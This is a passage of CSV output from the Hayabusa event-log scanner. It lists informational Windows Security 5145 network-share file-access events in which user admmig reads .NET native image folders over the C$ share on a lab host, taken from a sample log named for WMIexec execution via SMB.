+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
